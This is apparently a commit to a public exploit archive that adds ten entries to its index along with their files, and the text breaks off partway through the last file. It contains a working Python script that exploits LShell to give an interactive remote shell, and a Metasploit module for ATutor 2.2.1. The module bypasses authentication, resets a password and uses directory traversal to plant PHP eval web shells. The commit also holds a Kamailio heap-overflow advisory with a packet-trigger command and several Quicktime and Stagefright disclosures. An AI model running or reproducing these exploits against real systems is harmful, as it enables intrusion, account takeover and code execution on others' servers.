DB: 2016-03-31
10 new exploits Wordpress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion WordPress Photocart Link Plugin 1.6 - Local File Inclusion LShell <= 0.9.15 - Remote Code Execution Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1 Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2 Apple Quicktime < 7.7.79.80.95 - PSD File Parsing Memory Corruption CubeCart 6.0.10 - Multiple Vulnerabilities Kamailio 4.3.4 - Heap-Based Buffer Overflow ATutor 2.2.1 Directory Traversal / Remote Code Execution Metaphor - Stagefright Exploit with ASLR Bypass
This commit is contained in:
parent
26ae373579
commit
5d20c14812
12 changed files with 894 additions and 0 deletions
10
files.csv
10
files.csv
|
@ -35829,6 +35829,7 @@ id,file,description,date,author,platform,type,port
|
|||
39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
|
||||
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
|
||||
39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
|
||||
39621,platforms/php/webapps/39621.txt,"Wordpress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
|
||||
39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8_ 3.7 - CSRF Vulnerabilities",2016-03-27,hyp3rlinx,hardware,webapps,80
|
||||
39599,platforms/windows/remote/39599.txt,"Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0
|
||||
39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0
|
||||
|
@ -35849,6 +35850,7 @@ id,file,description,date,author,platform,type,port
|
|||
39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0
|
||||
39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0
|
||||
39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86_x64 - execve(/bin/sh) - 26 bytes",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39623,platforms/php/webapps/39623.txt,"WordPress Photocart Link Plugin 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
|
||||
39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86_x64 - execve(/bin/sh) - 25 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86_x64 - execve(/bin/bash) - 33 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69
|
||||
|
@ -35856,3 +35858,11 @@ id,file,description,date,author,platform,type,port
|
|||
39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0
|
||||
39630,platforms/windows/local/39630.g,"Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0
|
||||
39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0
|
||||
39632,platforms/linux/remote/39632.py,"LShell <= 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0
|
||||
39633,platforms/multiple/dos/39633.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1",2016-03-30,"Francis Provencher",multiple,dos,0
|
||||
39634,platforms/multiple/dos/39634.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2",2016-03-30,"Francis Provencher",multiple,dos,0
|
||||
39635,platforms/multiple/dos/39635.txt,"Apple Quicktime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0
|
||||
39637,platforms/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80
|
||||
39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap-Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0
|
||||
39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 Directory Traversal / Remote Code Execution",2016-03-30,metasploit,php,remote,80
|
||||
39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
27
platforms/android/remote/39640.txt
Executable file
27
platforms/android/remote/39640.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
Source: https://github.com/NorthBit/Metaphor
|
||||
|
||||
Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd.
|
||||
|
||||
Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf
|
||||
|
||||
Twitter: https://twitter.com/High_Byte
|
||||
|
||||
Metaphor's source code is now released! The source include a PoC that generates MP4 exploits in real-time and bypassing ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. Server-side of the PoC include simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php.
|
||||
|
||||
The exploit generator is written in Python and used by the PHP code.
|
||||
|
||||
usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ...
|
||||
|
||||
positional arguments:
|
||||
{leak,rce,suicide} Type of exploit to generate
|
||||
|
||||
optional arguments:
|
||||
-h, --help show this help message and exit
|
||||
-c CONFIG, --config CONFIG
|
||||
Override exploit configuration
|
||||
-o OUTPUT, --output OUTPUT
|
||||
Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39640.zip
|
72
platforms/linux/dos/39638.txt
Executable file
72
platforms/linux/dos/39638.txt
Executable file
|
@ -0,0 +1,72 @@
|
|||
census ID: census-2016-0009
|
||||
CVE ID: CVE-2016-2385
|
||||
Affected Products: Kamailio 4.3.4 (and possibly previous versions)
|
||||
Class: Heap-based Buffer Overflow (CWE-122)
|
||||
Remote: Yes
|
||||
Discovered by: Stelios Tsampas
|
||||
Kamailio (successor of former OpenSER and SER) is an Open Source SIP Server released under GPL, able to handle thousands of call setups per second. Kamailio can be used to build large platforms for VoIP and realtime communications, presence, WebRTC, Instant messaging and other applications. It can also easily be applied to scaling up SIP-to-PSTN gateways, PBX systems or media servers.
|
||||
|
||||
There is a (remotely exploitable) heap overflow vulnerability in Kamailio version 4.3.4 and possibly in previous versions. The vulnerability takes place in the SEAS module, which enables Kamailio to transfer the execution logic control of a SIP message to a given external entity, called the Application Server.
|
||||
|
||||
Details
|
||||
|
||||
The heap overflow can be triggered if Kamailio is configured to use the SEAS module, more specifically if Kamailio calls the module’s single exported function as_relay_t(). The heap overflow is located in function encode_msg(), file encode_msg.c, line 269:
|
||||
|
||||
|
||||
int encode_msg(struct sip_msg *msg, char *payload,int len)
|
||||
{
|
||||
...
|
||||
/*now we copy the actual message after the headers-meta-section*/
|
||||
memcpy(&payload[j],msg->buf,msg->len);
|
||||
LM_DBG("msglen = %d,msg starts at %d\n",msg->len,j);
|
||||
j=htons(j);
|
||||
...
|
||||
}
|
||||
|
||||
msg is a pointer to a sip_msg structure and it is basically the current SIP packet being processed by Kamailio. msg->buf is a buffer which holds the packet's contents and msg->len is the packet's length. Unsurprisingly, msg->len can take arbitrary values (bound by the packet size) while j takes the value of 180 in most cases.
|
||||
|
||||
The destination buffer payload is allocated in encoded_msg()'s caller function, create_as_event_t(), specifically in file seas.c, line 442:
|
||||
|
||||
|
||||
char * create_as_event_t(struct cell *t, struct sip_msg *msg, char processor_id,
|
||||
int *evt_len, int flags)
|
||||
{
|
||||
...
|
||||
if(!(buffer=shm_malloc(ENCODED_MSG_SIZE))){
|
||||
LM_ERR("Out Of Memory !!\n");
|
||||
return 0;
|
||||
}
|
||||
...
|
||||
if(encode_msg(msg,buffer+k,ENCODED_MSG_SIZE-k)<0){
|
||||
LM_ERR("Unable to encode msg\n");
|
||||
goto error;
|
||||
}
|
||||
...
|
||||
}
|
||||
|
||||
Preprocessor constant ENCODE_MSG_SIZE is defined as 3200 and variable k at line 521 holds the value 34. The problem is that the program does not check the packet's length if it is larger than the destination buffer. If a user makes a request with a large enough packet then the buffer will overflow.
|
||||
|
||||
Discussion
|
||||
|
||||
We were able to trigger the bug remotely using a large UDP packet.
|
||||
|
||||
A proof-of-concept packet is provided below that crashes the Kamailio process handling the request. From bash the packet can be sent using the following command:
|
||||
|
||||
|
||||
cat seas-trigger.packet > /dev/udp/KAMAILIO-IP/KAMAILIO-PORT
|
||||
|
||||
This bug may potentially provide attackers with remote code execution capabilities.
|
||||
|
||||
Recommendation
|
||||
|
||||
The security defect has been fixed in version 4.3.5 of Kamailio. Upgrading to the latest stable version is strongly advised.
|
||||
Disclosure Timeline
|
||||
|
||||
Vendor Contact: February 12th, 2016
|
||||
CVE assignment: February 15th, 2016
|
||||
Vendor Patch Release: March 3rd, 2016
|
||||
Public Advisory: March 30th, 2016
|
||||
|
||||
Proof of Concept:
|
||||
https://census-labs.com/media/seas-trigger.packet
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39638.zip
|
|
@ -58,6 +58,8 @@
|
|||
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
|
||||
*/
|
||||
|
||||
// EDB-Note: You may need to add '#define _GNU_SOURCE' to compile in later versions
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/socket.h>
|
||||
#include <fcntl.h>
|
||||
|
|
86
platforms/linux/remote/39632.py
Executable file
86
platforms/linux/remote/39632.py
Executable file
|
@ -0,0 +1,86 @@
|
|||
import paramiko
|
||||
import traceback
|
||||
from time import sleep
|
||||
|
||||
#
|
||||
# Exploit lshell pathing vulnerability in <= 0.9.15.
|
||||
# Runs commands on the remote system.
|
||||
# @dronesec
|
||||
#
|
||||
|
||||
if len(sys.argv) < 4:
|
||||
print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])
|
||||
sys.exit(1)
|
||||
|
||||
try:
|
||||
print '[!] .............................'
|
||||
print '[!] lshell <= 0.9.15 remote shell.'
|
||||
print '[!] note: you can also ssh in and execute \'/bin/bash\''
|
||||
print '[!] .............................'
|
||||
print '[!] Checking host %s...'%(sys.argv[3])
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
if len(sys.argv) == 5:
|
||||
ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
|
||||
else:
|
||||
ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
|
||||
|
||||
|
||||
# verify lshell
|
||||
channel = ssh.invoke_shell()
|
||||
while not channel.recv_ready(): sleep(1)
|
||||
ret = channel.recv(2048)
|
||||
|
||||
channel.send('help help\n')
|
||||
while not channel.recv_ready(): sleep(1)
|
||||
ret = channel.recv(2048)
|
||||
|
||||
if not 'lshell' in ret:
|
||||
if 'forbidden' in ret:
|
||||
print '[-] Looks like we can\'t execute SSH commands'
|
||||
else:
|
||||
print '[-] Environment is not lshell'
|
||||
sys.exit(1)
|
||||
|
||||
# verify vulnerable version
|
||||
channel.send('sudo\n')
|
||||
while not channel.recv_ready(): sleep(1)
|
||||
ret = channel.recv(2048)
|
||||
if not 'Traceback' in ret:
|
||||
print '[-] lshell version not vulnerable.'
|
||||
sys.exit(1)
|
||||
channel.close()
|
||||
ssh.close()
|
||||
|
||||
# exec shell
|
||||
print '[+] vulnerable lshell found, preparing pseudo-shell...'
|
||||
if len(sys.argv) == 5:
|
||||
ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
|
||||
else:
|
||||
ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
|
||||
|
||||
while True:
|
||||
cmd = raw_input('$ ')
|
||||
|
||||
# breaks paramiko
|
||||
if cmd[0] is '/':
|
||||
print '[!] Running binaries won\'t work!'
|
||||
continue
|
||||
|
||||
cmd = cmd.replace("'", r"\'")
|
||||
cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))
|
||||
if len(cmd) > 1:
|
||||
if 'quit' in cmd or 'exit' in cmd:
|
||||
break
|
||||
(stdin,stdout,stderr) = ssh.exec_command(cmd)
|
||||
out = stdout.read()
|
||||
print out.strip()
|
||||
except paramiko.AuthenticationException:
|
||||
print '[-] Authentication to %s failed.'%sys.argv[3]
|
||||
except Exception, e:
|
||||
print '[-] Error: ', e
|
||||
print type(e)
|
||||
traceback.print_exc(file=sys.stdout)
|
||||
finally:
|
||||
channel.close()
|
||||
ssh.close()
|
68
platforms/multiple/dos/39633.txt
Executable file
68
platforms/multiple/dos/39633.txt
Executable file
|
@ -0,0 +1,68 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Apple Quicktime
|
||||
|
||||
Platforms: Windows, OSX
|
||||
|
||||
Versions: before version 7.7.79.80.95
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Website: http://www.protekresearchlab.com/
|
||||
|
||||
Twitter: @COSIG_ @protekresearch
|
||||
|
||||
CVE-2016-1767
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
|
||||
|
||||
(https://en.wikipedia.org/wiki/QuickTime)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2016-01-07: Francis Provencher from COSIG report issue to Apple security team;
|
||||
2016-01-13: Apple security team confirmed this issue;
|
||||
2016-03-22: Apple fixed this issue;
|
||||
|
||||
https://support.apple.com/en-us/HT206167
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
|
||||
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
|
||||
|
||||
By providing a malformed FPX file, an attacker is able to create controlled memory corruption, and execute code in the context of the current user.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
Proof of Concept:
|
||||
http://protekresearchlab.com/exploits/COSIG-2016-14.fpx
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39633.zip
|
||||
|
||||
###############################################################################
|
67
platforms/multiple/dos/39634.txt
Executable file
67
platforms/multiple/dos/39634.txt
Executable file
|
@ -0,0 +1,67 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Apple Quicktime
|
||||
|
||||
Platforms: Windows, OSX
|
||||
|
||||
Versions: before version 7.7.79.80.95
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Website: http://www.protekresearchlab.com/
|
||||
|
||||
Twitter: @COSIG_ @protekresearch
|
||||
|
||||
CVE-2016-1768
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
|
||||
|
||||
(https://en.wikipedia.org/wiki/QuickTime)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2016-01-07: Francis Provencher from COSIG report issue to Apple security team;
|
||||
2016-01-13: Apple security team confirmed this issue;
|
||||
2016-03-22: Apple fixed this issue;
|
||||
|
||||
https://support.apple.com/en-us/HT206167
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
|
||||
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
|
||||
|
||||
By providing a malformed FPX file, an attacker is able to create controlled memory corruption, and execute code in the context of the current user.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
http://protekresearchlab.com/exploits/COSIG-2016-15.fpx
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39634.zip
|
||||
|
||||
###############################################################################
|
67
platforms/multiple/dos/39635.txt
Executable file
67
platforms/multiple/dos/39635.txt
Executable file
|
@ -0,0 +1,67 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: Apple Quicktime
|
||||
|
||||
Platforms: Windows, OSX
|
||||
|
||||
Versions: before version 7.7.79.80.95
|
||||
|
||||
Author: Francis Provencher of COSIG
|
||||
|
||||
Website: http://www.protekresearchlab.com/
|
||||
|
||||
Twitter: @COSIG_ @protekresearch
|
||||
|
||||
CVE-2016-1769
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
|
||||
QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
|
||||
|
||||
(https://en.wikipedia.org/wiki/QuickTime)
|
||||
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
|
||||
2016-01-07: Francis Provencher from COSIG report issue to Apple security team;
|
||||
2016-01-13: Apple security team confirmed this issue;
|
||||
2016-03-22: Apple fixed this issue;
|
||||
|
||||
https://support.apple.com/en-us/HT206167
|
||||
#####################################################################################
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
|
||||
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
|
||||
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
|
||||
|
||||
By providing a malformed PSD file, an attacker is able to create an out of bound read condition and execute code in the context of the current user or may allow access to sensitive memory space.
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===========
|
||||
|
||||
4) POC
|
||||
|
||||
===========
|
||||
|
||||
http://protekresearchlab.com/exploits/COSIG-2016-16.psd
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39635.zip
|
||||
|
||||
###############################################################################
|
360
platforms/php/remote/39639.rb
Executable file
360
platforms/php/remote/39639.rb
Executable file
|
@ -0,0 +1,360 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'ATutor 2.2.1 Directory Traversal / Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP
|
||||
setup with display_errors set to On, which can be used to allow us to upload a malicious
|
||||
ZIP file. On the web application, a blacklist verification is performed before extraction,
|
||||
however it is not sufficient to prevent exploitation.
|
||||
|
||||
You are required to login to the target to reach the vulnerability, however this can be
|
||||
done as a student account and remote registration is enabled by default.
|
||||
|
||||
Just in case remote registration isn't enabled, this module uses 2 vulnerabilities
|
||||
in order to bypass the authentication:
|
||||
|
||||
1. confirm.php Authentication Bypass Type Juggling vulnerability
|
||||
2. password_reminder.php Remote Password Reset TOCTOU vulnerability
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.atutor.ca/' ], # Official Website
|
||||
[ 'URL', 'http://sourceincite.com/research/src-2016-09/' ], # Type Juggling Advisory
|
||||
[ 'URL', 'http://sourceincite.com/research/src-2016-10/' ], # TOCTOU Advisory
|
||||
[ 'URL', 'http://sourceincite.com/research/src-2016-11/' ], # Directory Traversal Advisory
|
||||
[ 'URL', 'https://github.com/atutor/ATutor/pull/107' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Mar 1 2016',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
|
||||
OptString.new('USERNAME', [false, 'The username to authenticate as']),
|
||||
OptString.new('PASSWORD', [false, 'The password to authenticate with'])
|
||||
],self.class)
|
||||
end
|
||||
|
||||
def print_status(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def print_error(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def print_good(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def check
|
||||
# there is no real way to finger print the target so we just
|
||||
# check if we can upload a zip and extract it into the web root...
|
||||
# obviously not ideal, but if anyone knows better, feel free to change
|
||||
if (not datastore['USERNAME'].blank? and not datastore['PASSWORD'].blank?)
|
||||
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], check=true)
|
||||
if student_cookie != nil && disclose_web_root
|
||||
begin
|
||||
if upload_shell(student_cookie, check=true) && found
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
rescue Msf::Exploit::Failed => e
|
||||
vprint_error(e.message)
|
||||
end
|
||||
else
|
||||
# if we cant login, it may still be vuln
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
else
|
||||
# if no creds are supplied, it may still be vuln
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def create_zip_file(check=false)
|
||||
zip_file = Rex::Zip::Archive.new
|
||||
@header = Rex::Text.rand_text_alpha_upper(4)
|
||||
@payload_name = Rex::Text.rand_text_alpha_lower(4)
|
||||
@archive_name = Rex::Text.rand_text_alpha_lower(3)
|
||||
@test_string = Rex::Text.rand_text_alpha_lower(8)
|
||||
# we traverse back into the webroot mods/ directory (since it will be writable)
|
||||
path = "../../../../../../../../../../../../..#{@webroot}mods/"
|
||||
|
||||
# we use this to give us the best chance of success. If a webserver has htaccess override enabled
|
||||
# we will win. If not, we may still win because these file extensions are often registered as php
|
||||
# with the webserver, thus allowing us remote code execution.
|
||||
if check
|
||||
zip_file.add_file("#{path}#{@payload_name}.txt", "#{@test_string}")
|
||||
else
|
||||
register_file_for_cleanup( ".htaccess", "#{@payload_name}.pht", "#{@payload_name}.php4", "#{@payload_name}.phtml")
|
||||
zip_file.add_file("#{path}.htaccess", "AddType application/x-httpd-php .phtml .php4 .pht")
|
||||
zip_file.add_file("#{path}#{@payload_name}.pht", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
|
||||
zip_file.add_file("#{path}#{@payload_name}.php4", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
|
||||
zip_file.add_file("#{path}#{@payload_name}.phtml", "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
|
||||
end
|
||||
zip_file.pack
|
||||
end
|
||||
|
||||
def found
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"),
|
||||
})
|
||||
if res and res.code == 200 and res.body =~ /#{@test_string}/
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
def disclose_web_root
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"),
|
||||
})
|
||||
@webroot = "/"
|
||||
@webroot << $1 if res and res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
|
||||
if @webroot != "/"
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
def call_php(ext)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"),
|
||||
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
|
||||
}, timeout=0.1)
|
||||
return res
|
||||
end
|
||||
|
||||
def exec_code
|
||||
res = nil
|
||||
res = call_php("pht")
|
||||
if res == nil
|
||||
res = call_php("phtml")
|
||||
end
|
||||
if res == nil
|
||||
res = call_php("php4")
|
||||
end
|
||||
end
|
||||
|
||||
def upload_shell(cookie, check)
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(create_zip_file(check), 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{@archive_name}.zip\"")
|
||||
post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"submit_import\"")
|
||||
data = post_data.to_s
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, "mods", "_standard", "tests", "question_import.php"),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'cookie' => cookie,
|
||||
'vars_get' => {
|
||||
'h' => ''
|
||||
}
|
||||
})
|
||||
if res && res.code == 302 && res.redirection.to_s.include?("question_db.php")
|
||||
return true
|
||||
end
|
||||
# unknown failure...
|
||||
fail_with(Failure::Unknown, "Unable to upload php code")
|
||||
return false
|
||||
end
|
||||
|
||||
def find_user(cookie)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "users", "profile.php"),
|
||||
'cookie' => cookie,
|
||||
# we need to set the agent to the same value that was in type_juggle,
|
||||
# since the bypassed session is linked to the user-agent. We can then
|
||||
# use that session to leak the username
|
||||
'agent' => ''
|
||||
})
|
||||
username = "#{$1}" if res and res.body =~ /<span id="login">(.*)<\/span>/
|
||||
if username
|
||||
return username
|
||||
end
|
||||
# else we fail, because we dont know the username to login as
|
||||
fail_with(Failure::Unknown, "Unable to find the username!")
|
||||
end
|
||||
|
||||
def type_juggle
|
||||
# high padding, means higher success rate
|
||||
# also, we use numbers, so we can count requests :p
|
||||
for i in 1..8
|
||||
for @number in ('0'*i..'9'*i)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "confirm.php"),
|
||||
'vars_post' => {
|
||||
'auto_login' => '',
|
||||
'code' => '0' # type juggling
|
||||
},
|
||||
'vars_get' => {
|
||||
'e' => @number, # the bruteforce
|
||||
'id' => '',
|
||||
'm' => '',
|
||||
# the default install script creates a member
|
||||
# so we know for sure, that it will be 1
|
||||
'member_id' => '1'
|
||||
},
|
||||
# need to set the agent, since we are creating x number of sessions
|
||||
# and then using that session to get leak the username
|
||||
'agent' => ''
|
||||
}, redirect_depth = 0) # to validate a successful bypass
|
||||
if res and res.code == 302
|
||||
cookie = "ATutorID=#{$3};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/
|
||||
return cookie
|
||||
end
|
||||
end
|
||||
end
|
||||
# if we finish the loop and have no sauce, we cant make pasta
|
||||
fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication")
|
||||
end
|
||||
|
||||
def reset_password
|
||||
# this is due to line 79 of password_reminder.php
|
||||
days = (Time.now.to_i/60/60/24)
|
||||
# make a semi strong password, we have to encourage security now :->
|
||||
pass = Rex::Text.rand_text_alpha(32)
|
||||
hash = Rex::Text.sha1(pass)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "password_reminder.php"),
|
||||
'vars_post' => {
|
||||
'form_change' => 'true',
|
||||
# the default install script creates a member
|
||||
# so we know for sure, that it will be 1
|
||||
'id' => '1',
|
